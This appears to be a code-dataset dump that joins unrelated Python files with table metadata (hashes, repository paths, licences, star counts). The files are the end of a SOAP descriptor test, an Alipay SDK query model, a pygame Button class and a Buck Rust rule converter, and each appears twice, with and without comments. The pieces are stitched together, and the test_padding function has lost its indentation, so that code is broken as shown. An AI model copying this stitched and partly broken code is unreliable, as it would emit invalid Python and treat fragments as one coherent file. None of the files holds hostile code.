                                poly += betas[n, k-1]*(rcut-np.clip(r, 0, rcut))**(k+2)
                            # Gaussian-broadened atomic density of this
                            # element evaluated at (r, theta, phi).
                            rho = 0
                            for i_pos in elem_pos:
                                ix = i_pos[0]
                                iy = i_pos[1]
                                iz = i_pos[2]
                                ri_squared = ix**2+iy**2+iz**2
                                rho += np.exp(-1/(2*sigma**2)*(r**2 + ri_squared - 2*r*(np.sin(theta)*np.cos(phi)*ix + np.sin(theta)*np.sin(phi)*iy + np.cos(theta)*iz)))
                            # Volume element for spherical coordinates.
                            jacobian = np.sin(theta)*r**2
                            return poly*ylm*rho*jacobian
                        # Triple integral over r, theta, phi.
                        cnlm = tplquad(
                            soap_coeff,
                            r1,
                            r2,
                            lambda r: t1,
                            lambda r: t2,
                            lambda r, theta: p1,
                            lambda r, theta: p2,
                            epsabs=0.0001,
                            epsrel=0.0001,
                        )
                        integral, error = cnlm
                        coeffs[iZ, n, l, im] = integral
        # Assemble the power spectrum from the numerical coefficients, keeping
        # only the unique (upper-triangular) entries in the same order as the
        # analytical implementation.
        numerical_power_spectrum = []
        for zi in range(n_elems):
            for zj in range(n_elems):
                for l in range(lmax+1):
                    for ni in range(nmax):
                        for nj in range(nmax):
                            if nj >= ni and zj >= zi:
                                value = np.dot(coeffs[zi, ni, l, :], coeffs[zj, nj, l, :])
                                prefactor = np.pi*np.sqrt(8/(2*l+1))
                                value *= prefactor
                                numerical_power_spectrum.append(value)
        self.assertTrue(np.allclose(numerical_power_spectrum, analytical_power_spectrum, atol=1e-15, rtol=0.01))
def test_padding(self):
np.random.seed(7)
for ncells in range(1, 6):
ncells = int(ncells)
for rcut in np.linspace(2, 10, 11):
for sigma in np.linspace(0.5, 2, 4):
soap_generator = SOAP(
rcut=rcut, nmax=4, lmax=4, sigma=sigma, species=["Ni", "Ti"], periodic=True
)
a = 2.993
niti = Atoms(
"NiTi",
positions=[[0.0, 0.0, 0.0], [a / 2, a / 2, a / 2]],
cell=[a, a, a],
pbc=[1, 1, 1],
)
niti = niti * ncells
a *= ncells
positions = niti.get_positions()
noise = np.random.normal(scale=0.5, size=positions.shape)
niti.set_positions(positions + noise)
niti.wrap()
orthogonal_soaps = soap_generator.create(niti)
niti.set_cell([[a, 0, 0], [0, a, 0], [a, 0, a]])
niti.wrap()
non_orthogonal_soaps = soap_generator.create(niti)
self.assertTrue(np.allclose(orthogonal_soaps, non_orthogonal_soaps, atol=1e-8, rtol=1e-2))
if __name__ == '__main__':
    # Collect every SOAP test case and run it with minimal output.
    loader = unittest.TestLoader()
    alltests = unittest.TestSuite([loader.loadTestsFromTestCase(SoapTests)])
    result = unittest.TextTestRunner(verbosity=0).run(alltests)
| true | true |
1c3c75123408af126c5c4039ef3cbcdf9d6476cc | 1,830 | py | Python | alipay/aop/api/domain/KoubeiRetailExtitemShopextitemQueryModel.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | [
"Apache-2.0"
] | 213 | 2018-08-27T16:49:32.000Z | 2021-12-29T04:34:12.000Z | alipay/aop/api/domain/KoubeiRetailExtitemShopextitemQueryModel.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | [
"Apache-2.0"
] | 29 | 2018-09-29T06:43:00.000Z | 2021-09-02T03:27:32.000Z | alipay/aop/api/domain/KoubeiRetailExtitemShopextitemQueryModel.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | [
"Apache-2.0"
] | 59 | 2018-08-27T16:59:26.000Z | 2022-03-25T10:08:15.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiRetailExtitemShopextitemQueryModel(object):
    """Request model for querying a retail shop's extended items.

    Serializes to / deserializes from the plain-dict format used by the
    Alipay open-API gateway.
    """

    def __init__(self):
        # Page number (1-based), page size, and the target shop id.
        self._page_no = None
        self._page_size = None
        self._shop_id = None

    @property
    def page_no(self):
        return self._page_no
    @page_no.setter
    def page_no(self, value):
        self._page_no = value
    @property
    def page_size(self):
        return self._page_size
    @page_size.setter
    def page_size(self, value):
        self._page_size = value
    @property
    def shop_id(self):
        return self._shop_id
    @shop_id.setter
    def shop_id(self, value):
        self._shop_id = value

    def to_alipay_dict(self):
        """Return the request as a plain dict, omitting unset fields.

        A field is included whenever it has been set (``is not None``), so
        falsy-but-valid values such as 0 or "" are serialized too (the
        previous truthiness check silently dropped them). Values that expose
        their own ``to_alipay_dict`` are serialized recursively.
        """
        params = dict()
        if self.page_no is not None:
            if hasattr(self.page_no, 'to_alipay_dict'):
                params['page_no'] = self.page_no.to_alipay_dict()
            else:
                params['page_no'] = self.page_no
        if self.page_size is not None:
            if hasattr(self.page_size, 'to_alipay_dict'):
                params['page_size'] = self.page_size.to_alipay_dict()
            else:
                params['page_size'] = self.page_size
        if self.shop_id is not None:
            if hasattr(self.shop_id, 'to_alipay_dict'):
                params['shop_id'] = self.shop_id.to_alipay_dict()
            else:
                params['shop_id'] = self.shop_id
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a model from a response dict; returns None for empty input."""
        if not d:
            return None
        o = KoubeiRetailExtitemShopextitemQueryModel()
        if 'page_no' in d:
            o.page_no = d['page_no']
        if 'page_size' in d:
            o.page_size = d['page_size']
        if 'shop_id' in d:
            o.shop_id = d['shop_id']
        return o
| 25.774648 | 69 | 0.574863 |
import json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiRetailExtitemShopextitemQueryModel(object):
    """Query model for a retail shop's extended items (Alipay open API)."""

    # Field names serialized to / from the gateway dict, in output order.
    def __init__(self):
        self._page_no = None
        self._page_size = None
        self._shop_id = None

    @property
    def page_no(self):
        return self._page_no

    @page_no.setter
    def page_no(self, value):
        self._page_no = value

    @property
    def page_size(self):
        return self._page_size

    @page_size.setter
    def page_size(self, value):
        self._page_size = value

    @property
    def shop_id(self):
        return self._shop_id

    @shop_id.setter
    def shop_id(self, value):
        self._shop_id = value

    def to_alipay_dict(self):
        """Serialize the truthy fields into the gateway's dict format."""
        params = dict()
        for key in ('page_no', 'page_size', 'shop_id'):
            value = getattr(self, key)
            if value:
                # Nested models know how to serialize themselves.
                if hasattr(value, 'to_alipay_dict'):
                    params[key] = value.to_alipay_dict()
                else:
                    params[key] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Deserialize a dict into a model; empty input maps to None."""
        if not d:
            return None
        o = KoubeiRetailExtitemShopextitemQueryModel()
        for key in ('page_no', 'page_size', 'shop_id'):
            if key in d:
                setattr(o, key, d[key])
        return o
| true | true |
1c3c763ba462e94efda486c16f0267e00a7c6a54 | 1,915 | py | Python | components/ui/button/index.py | wonknu/head_shot_adfab | 7e85c483ef3d4c8044e24f0132c0a2b700108d29 | [
"MIT"
] | null | null | null | components/ui/button/index.py | wonknu/head_shot_adfab | 7e85c483ef3d4c8044e24f0132c0a2b700108d29 | [
"MIT"
] | null | null | null | components/ui/button/index.py | wonknu/head_shot_adfab | 7e85c483ef3d4c8044e24f0132c0a2b700108d29 | [
"MIT"
] | null | null | null | # -*- coding: cp1252 -*-
#/usr/bin/env python
#Simon H. Larsen
#Buttons
#Project startet: d. 26. august 2012
import pygame
from pygame.locals import *
pygame.init()
class Button:
    """A simple rectangular pygame button with a soft drop shadow and a
    centered text label.
    """

    def create_button(self, surface, color, x, y, length, height, width, text, text_color):
        """Draw the button onto *surface* and remember its hit rectangle.

        Returns the surface so calls can be chained.
        """
        surface = self.draw_button(surface, color, length, height, x, y, width)
        surface = self.write_text(surface, text, text_color, length, height, x, y)
        self.rect = pygame.Rect(x, y, length, height)
        return surface

    def write_text(self, surface, text, text_color, length, height, x, y):
        """Render *text* centered inside the button area."""
        # Scale the font down as the label gets longer so it keeps fitting.
        font_size = int(length // len(text))
        my_font = pygame.font.SysFont("Calibri", font_size)
        my_text = my_font.render(text, 1, text_color)
        surface.blit(my_text, ((x + length / 2) - my_text.get_width() / 2,
                               (y + height / 2) - my_text.get_height() / 2))
        return surface

    def draw_button(self, surface, color, length, height, x, y, width):
        """Draw a fading halo of translucent layers, then the button body."""
        for i in range(1, 10):
            s = pygame.Surface((length + (i * 2), height + (i * 2)))
            s.fill(color)
            # Fade the halo with distance. Integer division keeps the alpha
            # an int on Python 3 as well (this code predates py3's true
            # division), matching the <= 0 guard below.
            alpha = 255 // (i + 2)
            if alpha <= 0:
                alpha = 1
            s.set_alpha(alpha)
            pygame.draw.rect(s, color, (x - i, y - i, length + i, height + i), width)
            surface.blit(s, (x - i, y - i))
        pygame.draw.rect(surface, color, (x, y, length, height), 0)
        pygame.draw.rect(surface, (190, 190, 190), (x, y, length, height), 1)
        return surface

    def pressed(self, mouse):
        """Return True when the (x, y) *mouse* position lies strictly inside
        the rectangle stored by create_button().
        """
        left, top = self.rect.topleft
        right, bottom = self.rect.bottomright
        return left < mouse[0] < right and top < mouse[1] < bottom
| 40.744681 | 106 | 0.557702 |
import pygame
from pygame.locals import *
pygame.init()
class Button:
    """Rectangular pygame button: shadowed body, centered label, hit test."""

    def create_button(self, surface, color, x, y, length, height, width, text, text_color):
        """Paint the button and store its clickable rect; returns the surface."""
        surface = self.draw_button(surface, color, length, height, x, y, width)
        surface = self.write_text(surface, text, text_color, length, height, x, y)
        self.rect = pygame.Rect(x, y, length, height)
        return surface

    def write_text(self, surface, text, text_color, length, height, x, y):
        """Blit *text* centered within the button bounds."""
        label_size = int(length // len(text))
        label_font = pygame.font.SysFont("Calibri", label_size)
        label = label_font.render(text, 1, text_color)
        center_x = (x + length / 2) - label.get_width() / 2
        center_y = (y + height / 2) - label.get_height() / 2
        surface.blit(label, (center_x, center_y))
        return surface

    def draw_button(self, surface, color, length, height, x, y, width):
        """Draw translucent outline layers, then the filled body and border."""
        for offset in range(1, 10):
            layer = pygame.Surface((length + (offset * 2), height + (offset * 2)))
            layer.fill(color)
            # Halo fades with distance from the button edge.
            alpha = 255 / (offset + 2)
            if alpha <= 0:
                alpha = 1
            layer.set_alpha(alpha)
            pygame.draw.rect(layer, color, (x - offset, y - offset, length + offset, height + offset), width)
            surface.blit(layer, (x - offset, y - offset))
        pygame.draw.rect(surface, color, (x, y, length, height), 0)
        pygame.draw.rect(surface, (190, 190, 190), (x, y, length, height), 1)
        return surface

    def pressed(self, mouse):
        """True when *mouse* falls strictly inside the stored rect."""
        inside_x = self.rect.topleft[0] < mouse[0] < self.rect.bottomright[0]
        inside_y = self.rect.topleft[1] < mouse[1] < self.rect.bottomright[1]
        return inside_x and inside_y
| true | true |
1c3c76482a0cb9666264509e6b327cac252b25de | 14,353 | py | Python | infra_macros/macro_lib/convert/rust.py | martarozek/buckit | 343cc5a5964c1d43902b6a77868652adaefa0caa | [
"BSD-3-Clause"
] | null | null | null | infra_macros/macro_lib/convert/rust.py | martarozek/buckit | 343cc5a5964c1d43902b6a77868652adaefa0caa | [
"BSD-3-Clause"
] | null | null | null | infra_macros/macro_lib/convert/rust.py | martarozek/buckit | 343cc5a5964c1d43902b6a77868652adaefa0caa | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python2
# Copyright 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import pipes
import os.path
macro_root = read_config('fbcode', 'macro_lib', '//macro_lib')
include_defs("{}/convert/base.py".format(macro_root), "base")
include_defs("{}/rule.py".format(macro_root))
include_defs("{}/fbcode_target.py".format(macro_root), "target")
load("{}:fbcode_target.py".format(macro_root),
"RootRuleTarget",
"RuleTarget",
"ThirdPartyRuleTarget")
load("@fbcode_macros//build_defs:platform_utils.bzl", "platform_utils")
class RustConverter(base.Converter):
    """Converts fbcode Rust rules (rust_library, rust_binary, rust_unittest)
    into their native Buck rule equivalents, adding fbcode-specific deps,
    linker flags, build-info and auto-generated unit-test rules.
    """
    def __init__(self, context, rule_type):
        # rule_type is the fbconfig-level rule name this instance handles.
        super(RustConverter, self).__init__(context)
        self._rule_type = rule_type
    def get_fbconfig_rule_type(self):
        """Return the fbconfig rule name handled by this converter."""
        return self._rule_type
    def get_buck_rule_type(self):
        """Return the native Buck rule name to emit for this fbconfig rule."""
        if self._rule_type == 'rust_unittest':
            return 'rust_test'
        else:
            return self._rule_type
    def is_binary(self):
        """Whether this rule type produces an executable (binary or test)."""
        return self.get_fbconfig_rule_type() in \
            ('rust_binary', 'rust_unittest',)
    def is_test(self):
        """Whether this rule type is a unit test rule."""
        return self.get_fbconfig_rule_type() in ('rust_unittest',)
    def is_deployable(self):
        """Executables are the deployable outputs."""
        return self.is_binary()
    def get_allowed_args(self):
        """Return the set of keyword arguments accepted by convert() for this
        rule type.
        """
        # common
        ok = set([
            'name',
            'srcs',
            'deps',
            'external_deps',
            'features',
            'rustc_flags',
            'crate',
            'crate_root',
        ])
        # non-tests
        if not self.is_test():
            ok |= set([
                'unittests',
                'tests',
                'test_deps',
                'test_external_deps',
                'test_srcs',
                'test_features',
                'test_rustc_flags',
                'test_link_style',
            ])
        else:
            ok.update(['framework'])
        # linkable
        if self.is_binary():
            ok |= set(['linker_flags', 'link_style', 'allocator'])
        else:
            ok |= set(['preferred_linkage', 'proc_macro'])
        return ok
    def get_rust_binary_deps(self, base_path, name, linker_flags, allocator):
        """Return the (deps, extra_rules) every Rust executable needs to link:
        the allocator/link deps plus explicit libc and libstdc++.
        """
        deps = []
        rules = []
        allocator = self.get_allocator(allocator)
        d, r = self.get_binary_link_deps(
            base_path,
            name,
            linker_flags,
            allocator,
        )
        deps.extend(d)
        rules.extend(r)
        # Always explicitly add libc - except for sanitizer modes, since
        # they already add them
        libc = ThirdPartyRuleTarget('glibc', 'c')
        if libc not in deps:
            deps.append(libc)
        # Always explicitly add libstdc++ - except for sanitizer modes, since
        # they already add them
        libgcc = ThirdPartyRuleTarget('libgcc', 'stdc++')
        if libgcc not in deps:
            deps.append(libgcc)
        return deps, rules
    def convert(self,
                base_path,
                name,
                srcs=None,
                deps=None,
                rustc_flags=None,
                features=None,
                crate=None,
                link_style=None,
                preferred_linkage=None,
                visibility=None,
                external_deps=None,
                crate_root=None,
                linker_flags=None,
                framework=True,
                unittests=True,
                proc_macro=False,
                tests=None,
                test_features=None,
                test_rustc_flags=None,
                test_link_style=None,
                test_linker_flags=None,
                test_srcs=None,
                test_deps=None,
                test_external_deps=None,
                allocator=None,
                **kwargs):
        """Convert one fbcode Rust rule into a list of Buck Rule objects.

        Returns the main rule first, followed by any auxiliary rules
        (build-info library, generated unit test, link-dep helpers).
        """
        extra_rules = []
        dependencies = []
        attributes = collections.OrderedDict()
        attributes['name'] = name
        attributes['srcs'] = self.convert_source_list(base_path, srcs or [])
        attributes['features'] = features or []
        if not crate_root and not self.is_test():
            # Compute a crate_root if one wasn't specified. We'll need this
            # to pass onto the generated test rule.
            topsrc_options = ((crate or name) + '.rs',)
            if self.get_fbconfig_rule_type() == 'rust_binary':
                topsrc_options += ('main.rs',)
            if self.get_fbconfig_rule_type() == 'rust_library':
                topsrc_options += ('lib.rs',)
            topsrc = []
            for s in srcs or []:
                # Generated sources (":rule" references) can't be inspected.
                if s.startswith(':'):
                    continue
                if os.path.basename(s) in topsrc_options:
                    topsrc.append(s)
            # Not sure what to do about too many or not enough crate roots
            if len(topsrc) == 1:
                crate_root = topsrc[0]
        if crate_root:
            attributes['crate_root'] = crate_root
        if rustc_flags:
            attributes['rustc_flags'] = rustc_flags
        if crate:
            attributes['crate'] = crate
        attributes['default_platform'] = platform_utils.get_buck_platform_for_base_path(base_path)
        if self.is_binary():
            platform = self.get_platform(base_path)
            if not link_style:
                link_style = self.get_link_style()
            attributes['link_style'] = link_style
            ldflags = self.get_ldflags(
                base_path,
                name,
                self.get_fbconfig_rule_type(),
                binary=True,
                build_info=True,
                platform=platform)
            attributes['linker_flags'] = ldflags + (linker_flags or [])
            # Add the Rust build info lib to deps.
            rust_build_info, rust_build_info_rules = (
                self.create_rust_build_info_rule(
                    base_path,
                    name,
                    crate,
                    self.get_fbconfig_rule_type(),
                    platform,
                    visibility))
            dependencies.append(rust_build_info)
            extra_rules.extend(rust_build_info_rules)
        else:
            if proc_macro:
                attributes['proc_macro'] = proc_macro
            if preferred_linkage:
                attributes['preferred_linkage'] = preferred_linkage
        if rustc_flags:
            attributes['rustc_flags'] = rustc_flags
        if visibility:
            attributes['visibility'] = visibility
        # Translate dependencies.
        for dep in deps or []:
            dependencies.append(target.parse_target(dep, base_path=base_path))
        # Translate external dependencies.
        for dep in external_deps or []:
            dependencies.append(self.normalize_external_dep(dep))
        if not tests:
            tests = []
        # Add test rule for all library/binary rules
        # It has the same set of srcs and dependencies as the base rule,
        # but also allows additional test srcs, deps and external deps.
        # test_features and test_rustc_flags override the base rule keys,
        # if present.
        if not self.is_test() and unittests:
            test, r = self.create_rust_test_rule(
                base_path,
                dependencies,
                attributes,
                test_srcs,
                test_deps,
                test_external_deps,
                test_rustc_flags,
                test_features,
                test_link_style,
                test_linker_flags,
                allocator,
                visibility,
            )
            tests.append(':' + test.attributes['name'])
            extra_rules.append(test)
            extra_rules.extend(r)
        attributes['tests'] = tests
        if self.is_test():
            attributes['framework'] = framework
        # Add in binary-specific link deps.
        # Do this after creating the test rule, so that it doesn't pick this
        # up as well (it will add its own binary deps as needed)
        if self.is_binary():
            d, r = self.get_rust_binary_deps(
                base_path,
                name,
                linker_flags,
                allocator,
            )
            dependencies.extend(d)
            extra_rules.extend(r)
        # If any deps were specified, add them to the output attrs.
        if dependencies:
            attributes['deps'], attributes['platform_deps'] = (
                self.format_all_deps(dependencies))
        return [Rule(self.get_buck_rule_type(), attributes)] + extra_rules
    def create_rust_test_rule(
            self,
            base_path,
            dependencies,
            attributes,
            test_srcs,
            test_deps,
            test_external_deps,
            test_rustc_flags,
            test_features,
            test_link_style,
            test_linker_flags,
            allocator,
            visibility):
        """
        Construct a rust_test rule corresponding to a rust_library or
        rust_binary rule so that internal unit tests can be run.

        Returns (test_rule, extra_rules); the test inherits the base rule's
        srcs, deps, crate settings and flags, with the test_* arguments
        adding to or overriding them.
        """
        rules = []
        test_attributes = collections.OrderedDict()
        name = '%s-unittest' % attributes['name']
        test_attributes['name'] = name
        if visibility is not None:
            test_attributes['visibility'] = visibility
        # Regardless of the base rule type, the resulting unit test is always
        # an executable which needs to have buildinfo.
        ldflags = self.get_ldflags(
            base_path,
            name,
            self.get_fbconfig_rule_type(),
            binary=True,
            strip_mode=None,
            build_info=True,
            platform=self.get_platform(base_path))
        test_attributes['default_platform'] = platform_utils.get_buck_platform_for_base_path(base_path)
        if 'crate' in attributes:
            test_attributes['crate'] = '%s_unittest' % attributes['crate']
        if 'crate_root' in attributes:
            test_attributes['crate_root'] = attributes['crate_root']
        # test_rustc_flags/test_features override the base values entirely.
        if test_rustc_flags:
            test_attributes['rustc_flags'] = test_rustc_flags
        elif 'rustc_flags' in attributes:
            test_attributes['rustc_flags'] = attributes['rustc_flags']
        if test_features:
            test_attributes['features'] = test_features
        elif 'features' in attributes:
            test_attributes['features'] = attributes['features']
        # Link style: explicit test override, then base rule, then default.
        link_style = self.get_link_style()
        if test_link_style:
            link_style = test_link_style
        elif 'link_style' in attributes:
            link_style = attributes['link_style']
        test_attributes['link_style'] = link_style
        test_attributes['linker_flags'] = ldflags + (test_linker_flags or [])
        # Test sources are the base sources plus any extra test_srcs.
        test_attributes['srcs'] = list(attributes.get('srcs', []))
        if test_srcs:
            test_attributes['srcs'] += (
                self.convert_source_list(base_path, test_srcs))
        # Base deps plus test-only (internal and external) deps, plus the
        # deps every Rust executable needs to link.
        deps = []
        deps.extend(dependencies)
        for dep in test_deps or []:
            deps.append(target.parse_target(dep, base_path=base_path))
        for dep in test_external_deps or []:
            deps.append(self.normalize_external_dep(dep))
        d, r = self.get_rust_binary_deps(
            base_path,
            name,
            test_attributes['linker_flags'],
            allocator,
        )
        deps.extend(d)
        rules.extend(r)
        test_attributes['deps'], test_attributes['platform_deps'] = (
            self.format_all_deps(deps))
        return Rule('rust_test', test_attributes), rules
    def create_rust_build_info_rule(
            self,
            base_path,
            name,
            crate,
            rule_type,
            platform,
            visibility):
        """
        Create rules to generate a Rust library with build info.

        Returns (target, rules): the dep target for the generated library and
        the genrule + rust_library rules that produce it. The library exposes
        a BUILDINFO constant whose fields come from get_build_info().
        """
        rules = []
        info = (
            self.get_build_info(
                base_path,
                name,
                rule_type,
                platform))
        # Rust source emitted as a string: a struct declaration followed by a
        # constant instance filled with the build-info values.
        template = """
#[derive(Debug, Copy, Clone, Eq, PartialEq, Ord, PartialOrd, Hash)]
pub struct BuildInfo {
"""
        # Construct a template
        for k, v in info.items():
            # NOTE: 'type' shadows the builtin here; kept for byte-compat.
            if isinstance(v, int):
                type = "u64"
            else:
                type = "&'static str"
            template += "    pub %s: %s,\n" % (k, type)
        template += "}\n"
        template += """
pub const BUILDINFO: BuildInfo = BuildInfo {
"""
        for k, v in info.items():
            if isinstance(v, int):
                template += "    %s: %s,\n" % (k, v)
            else:
                template += "    %s: \"%s\",\n" % (k, v)
        template += "};\n"
        # Setup a rule to generate the build info Rust file.
        source_name = name + "-rust-build-info"
        source_attrs = collections.OrderedDict()
        source_attrs['name'] = source_name
        if visibility is not None:
            source_attrs['visibility'] = visibility
        source_attrs['out'] = 'lib.rs'
        source_attrs['cmd'] = (
            'mkdir -p `dirname $OUT` && echo {0} > $OUT'
            .format(pipes.quote(template)))
        rules.append(Rule('genrule', source_attrs))
        # Setup a rule to compile the build info C file into a library.
        lib_name = name + '-rust-build-info-lib'
        lib_attrs = collections.OrderedDict()
        lib_attrs['name'] = lib_name
        if visibility is not None:
            lib_attrs['visibility'] = visibility
        lib_attrs['crate'] = (crate or name) + "_build_info"
        lib_attrs['preferred_linkage'] = 'static'
        lib_attrs['srcs'] = [':' + source_name]
        lib_attrs['default_platform'] = platform_utils.get_buck_platform_for_base_path(base_path)
        rules.append(Rule('rust_library', lib_attrs))
        return RootRuleTarget(base_path, lib_name), rules
| 32.181614 | 103 | 0.554031 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import pipes
import os.path
macro_root = read_config('fbcode', 'macro_lib', '//macro_lib')
include_defs("{}/convert/base.py".format(macro_root), "base")
include_defs("{}/rule.py".format(macro_root))
include_defs("{}/fbcode_target.py".format(macro_root), "target")
load("{}:fbcode_target.py".format(macro_root),
"RootRuleTarget",
"RuleTarget",
"ThirdPartyRuleTarget")
load("@fbcode_macros//build_defs:platform_utils.bzl", "platform_utils")
class RustConverter(base.Converter):
def __init__(self, context, rule_type):
super(RustConverter, self).__init__(context)
self._rule_type = rule_type
def get_fbconfig_rule_type(self):
return self._rule_type
def get_buck_rule_type(self):
if self._rule_type == 'rust_unittest':
return 'rust_test'
else:
return self._rule_type
def is_binary(self):
return self.get_fbconfig_rule_type() in \
('rust_binary', 'rust_unittest',)
def is_test(self):
return self.get_fbconfig_rule_type() in ('rust_unittest',)
def is_deployable(self):
return self.is_binary()
def get_allowed_args(self):
ok = set([
'name',
'srcs',
'deps',
'external_deps',
'features',
'rustc_flags',
'crate',
'crate_root',
])
if not self.is_test():
ok |= set([
'unittests',
'tests',
'test_deps',
'test_external_deps',
'test_srcs',
'test_features',
'test_rustc_flags',
'test_link_style',
])
else:
ok.update(['framework'])
if self.is_binary():
ok |= set(['linker_flags', 'link_style', 'allocator'])
else:
ok |= set(['preferred_linkage', 'proc_macro'])
return ok
def get_rust_binary_deps(self, base_path, name, linker_flags, allocator):
deps = []
rules = []
allocator = self.get_allocator(allocator)
d, r = self.get_binary_link_deps(
base_path,
name,
linker_flags,
allocator,
)
deps.extend(d)
rules.extend(r)
libc = ThirdPartyRuleTarget('glibc', 'c')
if libc not in deps:
deps.append(libc)
libgcc = ThirdPartyRuleTarget('libgcc', 'stdc++')
if libgcc not in deps:
deps.append(libgcc)
return deps, rules
def convert(self,
base_path,
name,
srcs=None,
deps=None,
rustc_flags=None,
features=None,
crate=None,
link_style=None,
preferred_linkage=None,
visibility=None,
external_deps=None,
crate_root=None,
linker_flags=None,
framework=True,
unittests=True,
proc_macro=False,
tests=None,
test_features=None,
test_rustc_flags=None,
test_link_style=None,
test_linker_flags=None,
test_srcs=None,
test_deps=None,
test_external_deps=None,
allocator=None,
**kwargs):
extra_rules = []
dependencies = []
attributes = collections.OrderedDict()
attributes['name'] = name
attributes['srcs'] = self.convert_source_list(base_path, srcs or [])
attributes['features'] = features or []
if not crate_root and not self.is_test():
topsrc_options = ((crate or name) + '.rs',)
if self.get_fbconfig_rule_type() == 'rust_binary':
topsrc_options += ('main.rs',)
if self.get_fbconfig_rule_type() == 'rust_library':
topsrc_options += ('lib.rs',)
topsrc = []
for s in srcs or []:
if s.startswith(':'):
continue
if os.path.basename(s) in topsrc_options:
topsrc.append(s)
if len(topsrc) == 1:
crate_root = topsrc[0]
if crate_root:
attributes['crate_root'] = crate_root
if rustc_flags:
attributes['rustc_flags'] = rustc_flags
if crate:
attributes['crate'] = crate
attributes['default_platform'] = platform_utils.get_buck_platform_for_base_path(base_path)
if self.is_binary():
platform = self.get_platform(base_path)
if not link_style:
link_style = self.get_link_style()
attributes['link_style'] = link_style
ldflags = self.get_ldflags(
base_path,
name,
self.get_fbconfig_rule_type(),
binary=True,
build_info=True,
platform=platform)
attributes['linker_flags'] = ldflags + (linker_flags or [])
rust_build_info, rust_build_info_rules = (
self.create_rust_build_info_rule(
base_path,
name,
crate,
self.get_fbconfig_rule_type(),
platform,
visibility))
dependencies.append(rust_build_info)
extra_rules.extend(rust_build_info_rules)
else:
if proc_macro:
attributes['proc_macro'] = proc_macro
if preferred_linkage:
attributes['preferred_linkage'] = preferred_linkage
if rustc_flags:
attributes['rustc_flags'] = rustc_flags
if visibility:
attributes['visibility'] = visibility
for dep in deps or []:
dependencies.append(target.parse_target(dep, base_path=base_path))
for dep in external_deps or []:
dependencies.append(self.normalize_external_dep(dep))
if not tests:
tests = []
if not self.is_test() and unittests:
test, r = self.create_rust_test_rule(
base_path,
dependencies,
attributes,
test_srcs,
test_deps,
test_external_deps,
test_rustc_flags,
test_features,
test_link_style,
test_linker_flags,
allocator,
visibility,
)
tests.append(':' + test.attributes['name'])
extra_rules.append(test)
extra_rules.extend(r)
attributes['tests'] = tests
if self.is_test():
attributes['framework'] = framework
# up as well (it will add its own binary deps as needed)
if self.is_binary():
d, r = self.get_rust_binary_deps(
base_path,
name,
linker_flags,
allocator,
)
dependencies.extend(d)
extra_rules.extend(r)
# If any deps were specified, add them to the output attrs.
if dependencies:
attributes['deps'], attributes['platform_deps'] = (
self.format_all_deps(dependencies))
return [Rule(self.get_buck_rule_type(), attributes)] + extra_rules
    def create_rust_test_rule(
            self,
            base_path,
            dependencies,
            attributes,
            test_srcs,
            test_deps,
            test_external_deps,
            test_rustc_flags,
            test_features,
            test_link_style,
            test_linker_flags,
            allocator,
            visibility):
        """
        Derive a Buck `rust_test` rule from a base rule's attributes.

        The test reuses the base rule's sources/flags, layered with the
        test-specific overrides passed in, and pulls in the implicit
        binary dependencies (build info, allocator, sanitizers).

        :return: a (Rule('rust_test'), extra_rules) pair; `extra_rules`
            holds any helper rules created for the binary deps.
        """
        rules = []
        test_attributes = collections.OrderedDict()

        name = '%s-unittest' % attributes['name']
        test_attributes['name'] = name
        if visibility is not None:
            test_attributes['visibility'] = visibility

        # Regardless of the base rule type, the resulting unit test is always
        # an executable which needs to have buildinfo.
        ldflags = self.get_ldflags(
            base_path,
            name,
            self.get_fbconfig_rule_type(),
            binary=True,
            strip_mode=None,
            build_info=True,
            platform=self.get_platform(base_path))

        test_attributes['default_platform'] = platform_utils.get_buck_platform_for_base_path(base_path)

        # Suffix the crate name so the test crate cannot collide with the
        # crate of the rule it is derived from.
        if 'crate' in attributes:
            test_attributes['crate'] = '%s_unittest' % attributes['crate']

        if 'crate_root' in attributes:
            test_attributes['crate_root'] = attributes['crate_root']

        # Test-specific rustc flags/features take precedence over the base
        # rule's, when supplied.
        if test_rustc_flags:
            test_attributes['rustc_flags'] = test_rustc_flags
        elif 'rustc_flags' in attributes:
            test_attributes['rustc_flags'] = attributes['rustc_flags']

        if test_features:
            test_attributes['features'] = test_features
        elif 'features' in attributes:
            test_attributes['features'] = attributes['features']

        # Link style precedence: explicit test override, then the base
        # rule's setting, then the converter default.
        link_style = self.get_link_style()
        if test_link_style:
            link_style = test_link_style
        elif 'link_style' in attributes:
            link_style = attributes['link_style']
        test_attributes['link_style'] = link_style

        test_attributes['linker_flags'] = ldflags + (test_linker_flags or [])

        # The test compiles the base rule's sources plus any test-only ones.
        test_attributes['srcs'] = list(attributes.get('srcs', []))
        if test_srcs:
            test_attributes['srcs'] += (
                self.convert_source_list(base_path, test_srcs))

        deps = []
        deps.extend(dependencies)

        for dep in test_deps or []:
            deps.append(target.parse_target(dep, base_path=base_path))

        for dep in test_external_deps or []:
            deps.append(self.normalize_external_dep(dep))

        # Tests are binaries, so add the implicit binary deps as well.
        d, r = self.get_rust_binary_deps(
            base_path,
            name,
            test_attributes['linker_flags'],
            allocator,
        )
        deps.extend(d)
        rules.extend(r)

        test_attributes['deps'], test_attributes['platform_deps'] = (
            self.format_all_deps(deps))

        return Rule('rust_test', test_attributes), rules
    def create_rust_build_info_rule(
            self,
            base_path,
            name,
            crate,
            rule_type,
            platform,
            visibility):
        """
        Synthesize a small Rust library that exposes build metadata.

        A `genrule` writes a generated `lib.rs` defining a `BuildInfo`
        struct plus a `BUILDINFO` constant populated from this rule's
        build info; a `rust_library` then wraps that generated source.

